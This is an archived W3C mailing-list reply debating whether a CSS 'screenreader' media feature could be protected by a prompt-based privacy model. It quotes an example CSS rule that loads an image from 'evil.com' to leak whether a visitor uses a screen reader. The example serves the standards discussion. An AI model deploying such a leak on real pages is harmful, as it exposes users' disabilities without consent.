> On Dec 2, 2014, at 1:46 PM, Florian Rivoal <florian@rivoal.net> wrote: > >> It'd be problematic to offer an unprotected "(screenreader)" media feature because it would offer any web page the ability to detect with a high degree of certainty that a visitor has a particular physical disability. In my opinion, it would be a privacy an personal security nightmare to implement *unless* CSS were to implement a media feature privacy model similar to the one defined in IndieUI User Context. > > I agree that a privacy protecting model is worth having for something like this. However, unless I am missing something, the privacy model you propose doesn’t provide adequate protection. What prevents authors form doing this: > > <style> > @media (screenreader) { #snoop { background: url(http://www.evil.com/info-leak.gif); } } > </style> > <div id=“snoop”></div> That wouldn't ever load the image until after the user had approved access. It would also not be subject to a timing attack because the prompt would not block. From the spec: To avoid privacy concerns, User Agents MUST immediately return the default value for any restricted features that will result in a user prompt. If and when the user chooses to share settings from the relevant category with the requesting page, the web page author can handle a user setting change callback, or make a subsequent request to the userSetting() method of the Window object. http://rawgit.com/w3c/indie-ui/master/src/indie-ui-context.html#RequirementsForUserSettingReceived on Tuesday, 2 December 2014 21:59:16 UTC
This archive was generated by hypermail 2.4.0 : Friday, 25 March 2022 10:08:49 UTC
